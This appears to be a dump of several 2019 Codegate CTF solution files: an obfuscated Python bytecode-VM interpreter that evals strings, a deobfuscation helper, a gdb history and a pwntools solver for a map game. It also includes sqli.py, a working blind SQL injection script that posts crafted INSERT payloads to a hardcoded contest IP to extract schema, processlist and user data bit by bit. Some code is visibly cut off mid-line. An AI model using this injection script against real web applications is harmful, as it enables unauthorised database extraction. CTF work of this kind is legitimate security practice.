OO0000O00O00OO00O=O000O000O00000O0O[OO0000O00O00OO00O] 65 | O0O0000O000O0OOOO=O0O00000O00OOO000[OO0O00O0OO0OO0000:OO0000O00O00OO00O] 66 | O000O000O00000O0O[O00000O000O0000OO]=O0O0000O000O0OOOO 67 | return 68 | 69 | def SAVE_DICT(O00OOO0OOOOOO0OOO): 70 | O0OOOOOOOO0OOO0O0=O00OOO0OOOOOO0OOO[2001] 71 | O0OOOOOOOO0OOO0O0=O0OOOOOOOO0OOO0O0.decode("utf-8") 72 | 73 | OOO00O0OOO0OO0O00=O00OOO0OOOOOO0OOO[2002] 74 | OOO00O0OOO0OO0O00=OOO00O0OOO0OO0O00.decode("utf-8") 75 | 76 | if OOO00O0OOO0OO0O00.isdigit(): 77 | OOO00O0OOO0OO0O00=int(OOO00O0OOO0OO0O00) 78 | else: 79 | OOO00O0OOO0OO0O00=O00OOO0OOOOOO0OOO[OOO00O0OOO0OO0O00] 80 | 81 | # 두번 째 인자 == key 82 | 83 | OOO0O000O0OOOO000=O00OOO0OOOOOO0OOO[2003] 84 | OOO0O000O0OOOO000=OOO0O000O0OOOO000.decode("utf-8") 85 | 86 | if OOO0O000O0OOOO000.isdigit(): 87 | OOO0O000O0OOOO000=int(OOO0O000O0OOOO000) 88 | else: 89 | OOO0O000O0OOOO000=O00OOO0OOOOOO0OOO[OOO0O000O0OOOO000] 90 | 91 | # 세번 쨰 인자 == ? 92 | 93 | # [arg1][arg2] = arg3 94 | 95 | O0000OOO0OOO000O0=O00OOO0OOOOOO0OOO[O0OOOOOOOO0OOO0O0] 96 | 97 | O0000OOO0OOO000O0[OOO00O0OOO0OO0O00]=OOO0O000O0OOOO000 98 | return 99 | 100 | def PLUS(OO0O00000O00OO0O0): 101 | OOO0O0O00OOO0O0O0=2001 102 | O0000000O0OOO000O=2002 103 | OOOOO000OOO000000=2003 104 | OOO000O0O00O0OOOO=OO0O00000O00OO0O0[OOO0O0O00OOO0O0O0] 105 | OOO000O0O00O0OOOO=OOO000O0O00O0OOOO.decode("utf-8") 106 | OOO0O0OOOO0O0OOOO=OO0O00000O00OO0O0[O0000000O0OOO000O] 107 | OOO0O0OOOO0O0OOOO=OOO0O0OOOO0O0OOOO.decode("utf-8") 108 | if OOO0O0OOOO0O0OOOO.isdigit(): 109 | OOO0O0OOOO0O0OOOO=int(OOO0O0OOOO0O0OOOO) 110 | else: 111 | OOO0O0OOOO0O0OOOO=OO0O00000O00OO0O0[OOO0O0OOOO0O0OOOO] 112 | O0O000O00OO000O00=OO0O00000O00OO0O0[OOOOO000OOO000000] 113 | O0O000O00OO000O00=O0O000O00OO000O00.decode("utf-8") 114 | if O0O000O00OO000O00.isdigit(): 115 | O0O000O00OO000O00=int(O0O000O00OO000O00) 116 | else: 117 | O0O000O00OO000O00=OO0O00000O00OO0O0[O0O000O00OO000O00] 118 | OOOOO0OO000OO0000=OOO0O0OOOO0O0OOOO+O0O000O00OO000O00 119 | 120 | print("PLUS {} + {}".format(hex(OOO0O0OOOO0O0OOOO), hex(O0O000O00OO000O00))) 121 | OO0O00000O00OO0O0[OOO000O0O00O0OOOO]=OOOOO0OO000OO0000 122 | return 123 | 124 | def XOR_SAVE(_SAVE): 125 | O00O0OOO00O00OOO0=_SAVE[2001] 126 | O00O0OOO00O00OOO0=O00O0OOO00O00OOO0.decode("utf-8") 127 | O0OO0OOOOO0OOOOO0=_SAVE[2002] 128 | O0OO0OOOOO0OOOOO0=O0OO0OOOOO0OOOOO0.decode("utf-8") 129 | 130 | 131 | if O0OO0OOOOO0OOOOO0.isdigit(): 132 | O0OO0OOOOO0OOOOO0=int(O0OO0OOOOO0OOOOO0) 133 | else: 134 | O0OO0OOOOO0OOOOO0=_SAVE[O0OO0OOOOO0OOOOO0] 135 | 136 | OOO0OO000OOO0O0OO=_SAVE[2003] 137 | OOO0OO000OOO0O0OO=OOO0OO000OOO0O0OO.decode("utf-8") 138 | 139 | if OOO0OO000OOO0O0OO.isdigit(): 140 | OOO0OO000OOO0O0OO=int(OOO0OO000OOO0O0OO) 141 | else: 142 | OOO0OO000OOO0O0OO=_SAVE[OOO0OO000OOO0O0OO] 143 | 144 | # print('XOR {} ^ {} ==> {}'.format(O0OO0OOOOO0OOOOO0, OOO0OO000OOO0O0OO, O00O0OOO00O00OOO0)) 145 | print("XOR {} + {}".format(hex(O0OO0OOOOO0OOOOO0), hex(OOO0OO000OOO0O0OO))) 146 | xor_result=O0OO0OOOOO0OOOOO0^OOO0OO000OOO0O0OO 147 | 148 | _SAVE[O00O0OOO00O00OOO0]=xor_result 149 | return 150 | 151 | 152 | def AND(OOO00O0O000OO00O0): 153 | O0O0OOO00000OO00O=2001 154 | O0O00000O0O00OO00=2002 155 | OOOO0OOOOO0O00000=2003 156 | O0000O00OO0O0O0OO=OOO00O0O000OO00O0[O0O0OOO00000OO00O] 157 | O0000O00OO0O0O0OO=O0000O00OO0O0O0OO.decode("utf-8") 158 | OO0O0O0OO00O00OO0=OOO00O0O000OO00O0[O0O00000O0O00OO00] 159 | OO0O0O0OO00O00OO0=OO0O0O0OO00O00OO0.decode("utf-8") 160 | if OO0O0O0OO00O00OO0.isdigit(): 161 | OO0O0O0OO00O00OO0=int(OO0O0O0OO00O00OO0) 162 | else: 163 | OO0O0O0OO00O00OO0=OOO00O0O000OO00O0[OO0O0O0OO00O00OO0] 164 | O00OO000O00O0OO00=OOO00O0O000OO00O0[OOOO0OOOOO0O00000] 165 | O00OO000O00O0OO00=O00OO000O00O0OO00.decode("utf-8") 166 | if O00OO000O00O0OO00.isdigit(): 167 | O00OO000O00O0OO00=int(O00OO000O00O0OO00) 168 | else: 169 | O00OO000O00O0OO00=OOO00O0O000OO00O0[O00OO000O00O0OO00] 170 | O000O0O00O00OOOO0=OO0O0O0OO00O00OO0&O00OO000O00O0OO00 171 | print("AND {} + {}".format(hex(OO0O0O0OO00O00OO0), hex(O00OO000O00O0OO00))) 172 | OOO00O0O000OO00O0[O0000O00OO0O0O0OO]=O000O0O00O00OOOO0 173 | return 174 | def OR(OOOOO0O00O0O0O0O0): 175 | O0OOOOO0O000O0O0O=2001 176 | O0O0OOOO000O00O0O=2002 177 | OO00O0OOOO00OOOO0=2003 178 | O0OO00OO00OOOOOO0=OOOOO0O00O0O0O0O0[O0OOOOO0O000O0O0O] 179 | O0OO00OO00OOOOOO0=O0OO00OO00OOOOOO0.decode("utf-8") 180 | O00OOO00O0000O00O=OOOOO0O00O0O0O0O0[O0O0OOOO000O00O0O] 181 | O00OOO00O0000O00O=O00OOO00O0000O00O.decode("utf-8") 182 | if O00OOO00O0000O00O.isdigit(): 183 | O00OOO00O0000O00O=int(O00OOO00O0000O00O) 184 | else: 185 | O00OOO00O0000O00O=OOOOO0O00O0O0O0O0[O00OOO00O0000O00O] 186 | O0000O000000OO000=OOOOO0O00O0O0O0O0[OO00O0OOOO00OOOO0] 187 | O0000O000000OO000=O0000O000000OO000.decode("utf-8") 188 | if O0000O000000OO000.isdigit(): 189 | O0000O000000OO000=int(O0000O000000OO000) 190 | else: 191 | O0000O000000OO000=OOOOO0O00O0O0O0O0[O0000O000000OO000] 192 | O0OO0OO0000000O00=O00OOO00O0000O00O|O0000O000000OO000 193 | print("OR {} | {}".format(hex(O00OOO00O0000O00O), hex(O0000O000000OO000))) 194 | OOOOO0O00O0O0O0O0[O0OO00OO00OOOOOO0]=O0OO0OO0000000O00 195 | return 196 | 197 | def RSHIFT(O00OO0OO00O0OOO00): 198 | O0OO0O000OOOOOO00=2001 199 | O0000O0OO00OO0000=2002 200 | OOOOOO00OOOO0O0O0=2003 201 | O0O0O0OO000O0OO0O=O00OO0OO00O0OOO00[O0OO0O000OOOOOO00] 202 | O0O0O0OO000O0OO0O=O0O0O0OO000O0OO0O.decode("utf-8") 203 | O0OOO0OOOOO00O0OO=O00OO0OO00O0OOO00[O0000O0OO00OO0000] 204 | O0OOO0OOOOO00O0OO=O0OOO0OOOOO00O0OO.decode("utf-8") 205 | if O0OOO0OOOOO00O0OO.isdigit(): 206 | O0OOO0OOOOO00O0OO=int(O0OOO0OOOOO00O0OO) 207 | else: 208 | O0OOO0OOOOO00O0OO=O00OO0OO00O0OOO00[O0OOO0OOOOO00O0OO] 209 | O000OO00O0OOO00OO=O00OO0OO00O0OOO00[OOOOOO00OOOO0O0O0] 210 | O000OO00O0OOO00OO=O000OO00O0OOO00OO.decode("utf-8") 211 | if O000OO00O0OOO00OO.isdigit(): 212 | O000OO00O0OOO00OO=int(O000OO00O0OOO00OO) 213 | else: 214 | O000OO00O0OOO00OO=O00OO0OO00O0OOO00[O000OO00O0OOO00OO] 215 | OO0OO0OOOO00O0O0O=O0OOO0OOOOO00O0OO >>O000OO00O0OOO00OO 216 | 217 | print("RSHIFT {} >> {}".format(hex(O0OOO0OOOOO00O0OO), hex(O000OO00O0OOO00OO))) 218 | O00OO0OO00O0OOO00[O0O0O0OO000O0OO0O]=OO0OO0OOOO00O0O0O 219 | return 220 | 221 | def LSHIFT(O0OO00OO000OOO0O0): 222 | OO00O00O0O0O00OO0=2001 223 | OOOOOO0O0OO00OOO0=2002 224 | OO0O00OO0000O0O0O=2003 225 | O000O00O0OOOO0000=O0OO00OO000OOO0O0[OO00O00O0O0O00OO0] 226 | O000O00O0OOOO0000=O000O00O0OOOO0000.decode("utf-8") 227 | OOOO0OOOOO000OOOO=O0OO00OO000OOO0O0[OOOOOO0O0OO00OOO0] 228 | OOOO0OOOOO000OOOO=OOOO0OOOOO000OOOO.decode("utf-8") 229 | if OOOO0OOOOO000OOOO.isdigit(): 230 | OOOO0OOOOO000OOOO=int(OOOO0OOOOO000OOOO) 231 | else: 232 | OOOO0OOOOO000OOOO=O0OO00OO000OOO0O0[OOOO0OOOOO000OOOO] 233 | OOO0OO00OO0O00OOO=O0OO00OO000OOO0O0[OO0O00OO0000O0O0O] 234 | OOO0OO00OO0O00OOO=OOO0OO00OO0O00OOO.decode("utf-8") 235 | if OOO0OO00OO0O00OOO.isdigit(): 236 | OOO0OO00OO0O00OOO=int(OOO0OO00OO0O00OOO) 237 | else: 238 | OOO0OO00OO0O00OOO=O0OO00OO000OOO0O0[OOO0OO00OO0O00OOO] 239 | OO00OOOOO0OOOO0OO=OOOO0OOOOO000OOOO<> {}".format(hex(OOOO0OOOOO000OOOO), hex(OOO0OO00OO0O00OOO))) 242 | O0OO00OO000OOO0O0[O000O00O0OOOO0000]=OO00OOOOO0OOOO0OO 243 | return 244 | 245 | def CALL_PYTHON_FUNCTION(OO00OOO000OO00O0O): 246 | O000OO0OOO0OO0000=2001 247 | O0OOO0O0OO0O0OO0O=2002 248 | OOOOO0OO0OOOOO000=1001 249 | OOO0OOO00O00O0OOO=OO00OOO000OO00O0O[O000OO0OOO0OO0000] 250 | OOO0OOO00O00O0OOO=OOO0OOO00O00O0OOO.decode("utf-8") 251 | O0O000O00O0O0000O=OO00OOO000OO00O0O[O0OOO0O0OO0O0OO0O] 252 | O0O000O00O0O0000O=O0O000O00O0O0000O.decode("utf-8") 253 | if O0O000O00O0O0000O.isdigit(): 254 | O0O000O00O0O0000O=int(O0O000O00O0O0000O) 255 | else: 256 | O0O000O00O0O0000O=OO00OOO000OO00O0O[O0O000O00O0O0000O] 257 | 258 | print('PYTHON FUNCTION -> ', OOO0OOO00O00O0OOO) 259 | OO0OOOO000O00OOO0=eval(OOO0OOO00O00O0OOO) 260 | O00O0OO00000OOO0O=OO0OOOO000O00OOO0(O0O000O00O0O0000O) 261 | OO00OOO000OO00O0O[OOOOO0OO0OOOOO000]=O00O0OO00000OOO0O 262 | return 263 | 264 | def O0O000000OO00O00O(OOO0OO0000OO0O0OO): 265 | O00OO0O0O000OOO00=2001 266 | O0OO0O0OO0OOOO0O0=1001 267 | O00O0OOOO00O00O00=OOO0OO0000OO0O0OO[O00OO0O0O000OOO00] 268 | O00O0OOOO00O00O00=O00O0OOOO00O00O00.decode("utf-8") 269 | print('eval', O00O0OOOO00O00O00) 270 | O00OOOO0OOO0O00OO=eval(O00O0OOOO00O00O00) 271 | O0O00OOO000OO0OO0=O00OOOO0OOO0O00OO() 272 | OOO0OO0000OO0O0OO[O0OO0O0OO0OOOO0O0]=O0O00OOO000OO0OO0 273 | return 274 | def O00OO0000OO00OO0O(OOO0OOOO00OO0O000): 275 | OOO0OO0000OO0O0O0=2001 276 | O000O0O0O0O00000O=1001 277 | O00O0OO00O00OOOO0=OOO0OOOO00OO0O000[OOO0OO0000OO0O0O0] 278 | O00O0OO00O00OOOO0=O00O0OO00O00OOOO0.decode("utf-8") 279 | if O00O0OO00O00OOOO0.isdigit(): 280 | O00O0OO00O00OOOO0=int(O00O0OO00O00OOOO0) 281 | else: 282 | O00O0OO00O00OOOO0=OOO0OOOO00OO0O000[O00O0OO00O00OOOO0] 283 | OOO0OOOO00OO0O000[O000O0O0O0O00000O]=O00O0OO00O00OOOO0 284 | return 285 | def SAVE_EVAL_RETURN(O0OOOO00000O00OO0): 286 | O00O0000O0OO00OO0=2001 287 | O00O000OO0O0000OO=1001 288 | O0O0O0O0OOOOOO0OO=O0OOOO00000O00OO0[O00O0000O0OO00OO0] 289 | O0O0O0O0OOOOOO0OO=O0O0O0O0OOOOOO0OO.decode("utf-8") 290 | OOOOO000OO0OOOOOO=O0OOOO00000O00OO0[O00O000OO0O0000OO] 291 | O0OOOO00000O00OO0[O0O0O0O0OOOOOO0OO]=OOOOO000OO0OOOOOO 292 | return 293 | 294 | def JUMP_EQUAL(OO000000OO0000000): 295 | OO0O00O0OOO0O0O00=2001 296 | OO0000000O0000OOO=2002 297 | O0O0OOOOOO0O00O00=2003 298 | O0OOO0OO0OOO00OO0=1000 299 | O0000O0OOO0O0OOOO=OO000000OO0000000[OO0O00O0OOO0O0O00] 300 | O0000O0OOO0O0OOOO=O0000O0OOO0O0OOOO.decode("utf-8") 301 | O0000O0OOO0O0OOOO=int(O0000O0OOO0O0OOOO) 302 | OO0O00OO0O0OO0000=OO000000OO0000000[OO0000000O0000OOO] 303 | OO0O00OO0O0OO0000=OO0O00OO0O0OO0000.decode("utf-8") 304 | if OO0O00OO0O0OO0000.isdigit(): 305 | OO0O00OO0O0OO0000=int(OO0O00OO0O0OO0000) 306 | else: 307 | OO0O00OO0O0OO0000=OO000000OO0000000[OO0O00OO0O0OO0000] 308 | OOO00OOOOO0000OO0=OO000000OO0000000[O0O0OOOOOO0O00O00] 309 | OOO00OOOOO0000OO0=OOO00OOOOO0000OO0.decode("utf-8") 310 | if OOO00OOOOO0000OO0.isdigit(): 311 | OOO00OOOOO0000OO0=int(OOO00OOOOO0000OO0) 312 | else: 313 | OOO00OOOOO0000OO0=OO000000OO0000000[OOO00OOOOO0000OO0] 314 | 315 | if OO0O00OO0O0OO0000==OOO00OOOOO0000OO0: 316 | OO000000OO0000000[O0OOO0OO0OOO00OO0]=O0000O0OOO0O0OOOO 317 | return 318 | 319 | def JUMP_NOT_EQAUL(SAVE_): 320 | O0O0O0OO0OOOO0O0O=SAVE_[2001] 321 | O0O0O0OO0OOOO0O0O=O0O0O0OO0OOOO0O0O.decode("utf-8") 322 | O0O0O0OO0OOOO0O0O=int(O0O0O0OO0OOOO0O0O) 323 | 324 | O0OO000O0O0000O00=SAVE_[2002] 325 | O0OO000O0O0000O00=O0OO000O0O0000O00.decode("utf-8") 326 | if O0OO000O0O0000O00.isdigit(): 327 | O0OO000O0O0000O00=int(O0OO000O0O0000O00) 328 | else: 329 | O0OO000O0O0000O00=SAVE_[O0OO000O0O0000O00] 330 | OO00O000OOO0OOO00=SAVE_[2003] 331 | OO00O000OOO0OOO00=OO00O000OOO0OOO00.decode("utf-8") 332 | 333 | if OO00O000OOO0OOO00.isdigit(): 334 | OO00O000OOO0OOO00=int(OO00O000OOO0OOO00) 335 | else: 336 | print("HERE", OO00O000OOO0OOO00, SAVE_[OO00O000OOO0OOO00]) 337 | OO00O000OOO0OOO00=SAVE_[OO00O000OOO0OOO00] 338 | 339 | 340 | print("COMPARE1", O0OO000O0O0000O00 , OO00O000OOO0OOO00) 341 | if O0OO000O0O0000O00 != OO00O000OOO0OOO00: 342 | SAVE_[1000]=O0O0O0OO0OOOO0O0O 343 | return 344 | 345 | def JUMP_RIGHT_GREATER(SAVE_): 346 | OOO0OO0OOO0OO0O00=2001 347 | OO00OOOO0OOOOOOOO=2002 348 | OOOO00OO0OOOO00O0=2003 349 | OOOOO0O0OOO0OOO0O=1000 350 | OO0OOO0O0O0000000=SAVE_[OOO0OO0OOO0OO0O00] 351 | OO0OOO0O0O0000000=OO0OOO0O0O0000000.decode("utf-8") 352 | OO0OOO0O0O0000000=int(OO0OOO0O0O0000000) 353 | O0OOO0O000O00OO0O=SAVE_[OO00OOOO0OOOOOOOO] 354 | O0OOO0O000O00OO0O=O0OOO0O000O00OO0O.decode("utf-8") 355 | if O0OOO0O000O00OO0O.isdigit(): 356 | O0OOO0O000O00OO0O=int(O0OOO0O000O00OO0O) 357 | else: 358 | O0OOO0O000O00OO0O=SAVE_[O0OOO0O000O00OO0O] 359 | OOO0OOO00O0000O0O=SAVE_[OOOO00OO0OOOO00O0] 360 | OOO0OOO00O0000O0O=OOO0OOO00O0000O0O.decode("utf-8") 361 | if OOO0OOO00O0000O0O.isdigit(): 362 | OOO0OOO00O0000O0O=int(OOO0OOO00O0000O0O) 363 | else: 364 | OOO0OOO00O0000O0O=SAVE_[OOO0OOO00O0000O0O] 365 | 366 | print("COMPARE2") 367 | if O0OOO0O000O00OO0O=OO00OOOO00O000OOO: 395 | SAVE_[OO00O0O0O00000OO0]=OO000OOOO00OO0OOO 396 | return 397 | 398 | 399 | def JUMP(SAVE_): 400 | O0OOOOOO0OO0O0OOO=2001 401 | O0O0OOOO0OOO0OO00=1000 402 | O0000OOO0000OO0O0=SAVE_[O0OOOOOO0OO0O0OOO] 403 | O0000OOO0000OO0O0=O0000OOO0000OO0O0.decode("utf-8") 404 | O0000OOO0000OO0O0=int(O0000OOO0000OO0O0) 405 | SAVE_[O0O0OOOO0OOO0OO00]=O0000OOO0000OO0O0 406 | return 407 | 408 | def first_call(code, flag): 409 | SAVE=dict() 410 | 411 | 412 | SAVE[1000]=0 413 | 414 | SAVE[1001]=0 415 | 416 | SAVE["flag"]=flag 417 | 418 | OOO000O0O0OOO0OOO=0 419 | while OOO000O0O0OOO0OOO==0: 420 | PC=SAVE[1000] # Counter 421 | 422 | OP=code[PC] # get_first 423 | 424 | PC=PC+1 425 | 426 | XP=code[PC] 427 | 428 | PC=PC+1 429 | 430 | if 0 2 and OUT[i]['ARGS'][k].count('O') > 2 and OUT[i]['ARGS'][k].isdigit() == False: 58 | if OUT[i]['ARGS'][k] in BOX: 59 | pass 60 | else: 61 | BOX[OUT[i]['ARGS'][k]] = FMT.format(COUNT) 62 | COUNT += 1 63 | 64 | OUT[i]['ARGS'][k] = BOX[OUT[i]['ARGS'][k]] 65 | 66 | pprint(OUT) -------------------------------------------------------------------------------- /2019/codegate/rich-project/sqli.py: -------------------------------------------------------------------------------- 1 | from requests import post 2 | import uuid 3 | 4 | def sqli(): 5 | headers = { 6 | 'Content-Type': 'application/x-www-form-urlencoded', 7 | } 8 | 9 | out = '' 10 | 11 | for i in xrange(1, 500): 12 | byte = '' 13 | for ii in xrange(1, 8): 14 | _id = str(uuid.uuid4()).replace('-', '') 15 | _id2 = str(uuid.uuid4()).replace('-', '') 16 | 17 | ''' 18 | ascii(substr(lpad( bin( ord(substr(user(), 1, 1)) ), 0, 7 ),1,1))>0 19 | 20 | limit, where, group 21 | user = db_manager@localhost 22 | db = userdata 23 | 24 | INSERT INTO users values('q!w's)4 p(7%4?b3#"2#r` fu00#sbqt','92429d82a41e930486c6de5ebda9602d55c39986','asdfasdf'), (0x71647322333 25 | 26 | having w=? 27 | 28 | anggimottijuno // asdfasdf 29 | ''' 30 | 31 | query = 'ascii(substr(lpad( bin( ord(substr(0x41, %d, 1)) ), 0, 7 ),%d,1))!=0' % (i, ii) 32 | xx = '(select group_concat(table_name) from information_schema.tables where table_schema=database())' 33 | xx = 'select table_name from information_schema.tables' 34 | 35 | xx = 'select info from information_schema.processlist having info like 0x{}'.format('%junoimisgod%'.encode('hex')) 36 | xx = 'select info from information_schema.processlist having info like 0x{}'.format('%sqli_is_god_fuck%'.encode('hex')) 37 | 38 | # xx = 'select id from user having id like 0x{}'.format('juno'.encode('hex')) 39 | 40 | # xx = 'select table_name from information_schema.tables having table_name like 0x{} and table_schema like 0x{}'.format('%users%'.encode('hex'), 'userdata'.encode('hex')) 41 | 42 | # xx = 'select name from users having name like 0x{}'.format('%anggimottijuno%'.encode('hex')) 43 | 44 | xx = 'select column_name from (select *,@ROWNUM6 := @ROWNUM6 +1 as ROWNUM from information_schema.columns, (select @ROWNUM6 := 0) R having table_name=0x7573657273 and ROWNUM=3)x' 45 | 46 | 47 | 48 | xx = 'select id from (select *,@ROWNUM6 := @ROWNUM6 +1 as ROWNUM from users, (select @ROWNUM6 := 0) R having ac like ROWNUM=1)x' 49 | # xx = 'select id from (select * from users having id=0x61646d316e6b796a)x' 50 | 51 | ## 6b7dfbea718383b12b4a0ac4aecd8c7aff78fe21 52 | query = ' substr(lpad(bin(ascii(substr( (%s) , %d, 1))),7,0),%d,1)>0x30 ' % (xx, 2, ii) 53 | # print query 54 | data = { 55 | 'id': _id2, 56 | 'pw': 'asdfasdf', 57 | 'ac': "asdfasdf'), (0x{_id}, 0x{pw}, if(({query}), (select 1 union select 2), 0x41))-- 1".format(_id=_id.encode('hex'), pw='6A204BD89F3C8348AFD5C77C717A097A'.encode('hex'), 58 | query=query, fuck='a'*0) 59 | } 60 | 61 | c = post('http://110.10.147.112/?p=reg', headers=headers, data=data) 62 | if 'error' in c.text: 63 | byte = byte + '0' 64 | elif 'hack' in c.text: 65 | print 'wtf?' 66 | exit(0) 67 | else: 68 | byte = byte + '1' 69 | 70 | out += chr(int(byte, 2)) 71 | print out 72 | 73 | 74 | 75 | 76 | sqli() -------------------------------------------------------------------------------- /2019/codegate_final/2048_map/.gdb_history: -------------------------------------------------------------------------------- 1 | r 2 | vmmap 3 | b *0x00005555555575C5 4 | r 5 | b *0x00005555555571F4 6 | c 7 | ni 8 | x/20gx 0x55555575d260 9 | c 10 | x/20gx 0x5555557d1b30 11 | x/s 0x5555557d1b30 12 | search -t qword 0x5555557d1b30 13 | x/20gx 0x55555575d270 14 | info b 15 | c 16 | ni 17 | ni 18 | c 19 | search -t qword 0x5555557d1730 20 | b *0x00005555555575E1 21 | c 22 | ni 23 | ni 24 | search -t qword 0x0x55555575d270 25 | search -t qword 0x5555557d1730 26 | ni 27 | x/gx 0x5555557d1730 28 | -------------------------------------------------------------------------------- /2019/codegate_final/2048_map/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import re 3 | from pprint import pprint 4 | 5 | ansi_escape = re.compile(r'\x1B\[([0-?]*[ -/]*[@-~])') 6 | 7 | 8 | r = remote('110.10.147.125', 20489) 9 | # r = remote('172.17.0.2', 20489) 10 | r.sendline('') 11 | r.sendline('') 12 | 13 | name = '@@@@' 14 | r.sendline(name) 15 | 16 | r.sendline('') 17 | 18 | def get_map(wtfwtf=False): 19 | MAP = range(22) 20 | 21 | r.recvuntil('o----------------------------------------------------------o') 22 | 23 | data = r.recvuntil('o----------------------------------------------------------o').replace('\x1b[47m#', 'J').split('\n') 24 | 25 | index = 0 26 | for x in data[1:-1]: 27 | # re.compile(r'\x1b\[\d{1,2}+X').sub('', x) 28 | # _ = repr(re.compile(r'\x1b\[\d+X').findall('juno${0}', x)) 29 | for _ in re.findall(r'\x1b\[\d+X', x): 30 | x = x.replace(_, ' ' * int(_.split('\x1b[')[1].split('X')[0])) 31 | 32 | MAP[index] = bytearray(ansi_escape.sub('', x).split('|\x1b(B')[0][1:]) 33 | index += 1 34 | 35 | if wtfwtf == True: 36 | pprint(data) 37 | 38 | return MAP 39 | 40 | def bfs(grid, start, goal, go=0): 41 | # go = 1 -> next 42 | # go = -1 -> prev 43 | queue = collections.deque([[start]]) 44 | seen = set([start]) 45 | 46 | if go != 0: 47 | ban = bytearray('><:msabcdezxv ') 48 | else: 49 | ban = bytearray(':msabcdezxv ') 50 | 51 | while queue: 52 | path = queue.popleft() 53 | x, y = path[-1] 54 | 55 | if grid[y][x] == goal: 56 | return path 57 | 58 | for x2, y2 in ((x+1,y), (x-1,y), (x,y+1), (x,y-1)): 59 | if 0 <= x2 < 58 and 0 <= y2 < 22 and grid[y2][x2] in ban and (x2, y2) not in seen: 60 | queue.append(path + [(x2, y2)]) 61 | seen.add((x2, y2)) 62 | 63 | 64 | print 'done' 65 | 66 | def make_path(_): 67 | if _ is None: 68 | return None 69 | ` 70 | p1 = _[0][0] 71 | p2 = _[0][1] 72 | 73 | s = '' 74 | 75 | print _ 76 | 77 | for i in xrange(1, len(_)): 78 | if _[i][0] + 1 == p1: 79 | s += 'h' 80 | elif _[i][0] - 1 == p1: 81 | s += 'k' 82 | elif _[i][1] + 1 == p2: 83 | s += 'u' 84 | elif _[i][1] - 1 == p2: 85 | s += 'j' 86 | else: 87 | print 'wtf?' 88 | 89 | p1 = _[i][0] 90 | p2 = _[i][1] 91 | 92 | 93 | # s += 'g' 94 | 95 | print 'path!', s 96 | return s 97 | 98 | 99 | 100 | 101 | def find_path(_map, what, go=0): 102 | table = ":msabcdezxv " 103 | 104 | # get my path 105 | for i in xrange(len(_map)): 106 | my_rc = _map[i].find('J') 107 | if my_rc != -1: 108 | break 109 | 110 | # print i, my_rc 111 | 112 | if what in '<>': 113 | go = 1 114 | 115 | return make_path(bfs(_map, (my_rc, i), ord(what), go)) 116 | 117 | 118 | get_map() 119 | 120 | def action(what): 121 | _ = get_map() 122 | 123 | path = find_path(_, what) 124 | 125 | if path is None: 126 | return None 127 | 128 | len_path = len(path) 129 | if what in 'abcde': 130 | path = path+'g' 131 | elif what in '<>': 132 | len_path 133 | elif what == 'm': 134 | path += 'm' 135 | 136 | 137 | r.sendline(path) 138 | 139 | for i in xrange(len_path): 140 | get_map() 141 | 142 | return True 143 | 144 | 145 | # count = 0 146 | 147 | # while True: 148 | # if action('e') is None: 149 | # print 'none..' 150 | # _ = get_map() 151 | # action('>') 152 | # r.sendline('h') 153 | # else: 154 | # count += 1 155 | 156 | # if count == 10: 157 | # break 158 | 159 | action('e') 160 | action('>') 161 | action('<') 162 | 163 | for i in xrange(5): 164 | action('e') 165 | action('>') 166 | action('<') 167 | r.sendline('h') 168 | get_map() 169 | get_map() 170 | 171 | action('>') 172 | action('>') 173 | 174 | ################# 175 | action('m') 176 | r.sendline('0') 177 | r.sendline('1') 178 | r.sendline('m') 179 | r.sendline('2') 180 | r.sendline('3') 181 | r.sendline('m') 182 | r.sendline('4') 183 | r.sendline('5') 184 | r.sendline('m') 185 | r.sendline('0') 186 | r.sendline('2') 187 | 188 | for i in xrange(11): 189 | print 'done', i 190 | get_map() 191 | 192 | ################# second phase 193 | 194 | for i in xrange(4): 195 | action('e') 196 | action('>') 197 | action('<') 198 | # r.sendline('h') 199 | get_map() 200 | # get_map() 201 | 202 | 203 | ################# 204 | action('m') 205 | r.sendline('1') 206 | r.sendline('2') 207 | r.sendline('m') 208 | r.sendline('3') 209 | r.sendline('5') 210 | r.sendline('m') 211 | r.sendline('1') 212 | r.sendline('3') 213 | 214 | r.sendline('m') # 128, 128 215 | r.sendline('0') 216 | r.sendline('1') 217 | 218 | for i in xrange(8 + 3): 219 | print 'done', i 220 | get_map() 221 | 222 | 223 | ######### third phase 224 | for i in xrange(4): 225 | print 'done', i 226 | action('e') 227 | action('>') 228 | action('<') 229 | # r.sendline('h') 230 | get_map() 231 | # get_map() 232 | 233 | ################# 234 | action('m') 235 | r.sendline('1') 236 | r.sendline('2') 237 | r.sendline('m') 238 | r.sendline('3') 239 | r.sendline('5') 240 | 241 | for i in xrange(5): 242 | print 'done', i 243 | get_map() 244 | 245 | ################# 246 | action('m') 247 | r.sendline('1') 248 | r.sendline('3') 249 | 250 | for i in xrange(2): 251 | print 'done', i 252 | get_map() 253 | 254 | 255 | 256 | ######### fourth phase 257 | for i in xrange(3): 258 | action('e') 259 | action('>') 260 | action('<') 261 | get_map() 262 | 263 | ################# 264 | action('m') 265 | r.sendline('2') 266 | r.sendline('3') 267 | r.sendline('m') 268 | r.sendline('2') 269 | r.sendline('4') 270 | 271 | r.sendline('m') 272 | r.sendline('1') 273 | r.sendline('2') 274 | 275 | r.sendline('m') 276 | r.sendline('0') 277 | r.sendline('1') 278 | 279 | for i in xrange(11): 280 | print 'done', i 281 | get_map() 282 | 283 | 284 | ######### fifth phase 285 | for i in xrange(4): 286 | action('e') 287 | action('>') 288 | action('<') 289 | get_map() 290 | 291 | ################# 292 | action('m') 293 | r.sendline('1') 294 | r.sendline('2') 295 | r.sendline('m') 296 | r.sendline('3') 297 | r.sendline('4') 298 | r.sendline('m') 299 | r.sendline('1') 300 | r.sendline('3') 301 | 302 | for i in xrange(8): 303 | print 'done', i 304 | get_map() 305 | 306 | 307 | ######### sixth phase 308 | for i in xrange(3): 309 | action('e') 310 | action('>') 311 | action('<') 312 | get_map() 313 | 314 | ################# 315 | action('m') 316 | r.sendline('2') 317 | r.sendline('3') 318 | r.sendline('m') 319 | r.sendline('4') 320 | r.sendline('5') 321 | r.sendline('m') 322 | r.sendline('2') 323 | r.sendline('4') 324 | r.sendline('m') 325 | r.sendline('1') 326 | r.sendline('2') 327 | 328 | for i in xrange(11): 329 | print 'done', i 330 | get_map() 331 | 332 | 333 | ######### seventh phase 334 | for i in xrange(4): 335 | action('e') 336 | action('>') 337 | action('<') 338 | get_map() 339 | 340 | ############ 341 | 342 | action('m') 343 | r.sendline('2') 344 | r.sendline('3') 345 | 